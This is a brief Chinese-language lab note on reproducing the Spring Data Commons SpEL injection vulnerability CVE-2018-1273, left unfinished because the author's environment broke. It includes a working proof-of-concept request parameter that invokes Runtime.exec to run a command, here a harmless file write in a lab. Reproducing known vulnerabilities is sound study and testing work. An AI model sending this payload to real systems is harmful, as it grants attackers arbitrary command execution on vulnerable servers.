spring 代码执⾏ （CVE-2018-1273）漏洞

一 漏洞简介

Spring Data 是⼀个⽤于简化数据库访问，并⽀持云服务的开源框架，Spring Data Commons 是 Spring Data 下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及 以前版本中，存在⼀处 SpEL 表达式注⼊漏洞，攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令       

1.1漏洞利用 

1.2漏洞复现

访问

然后填写注册信息，抓包

加入POC

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t ouch /tmp/zcc")]=&password=&repeatedPassword=

进入kali终端发现成功写入

环境出问题了 改天补齐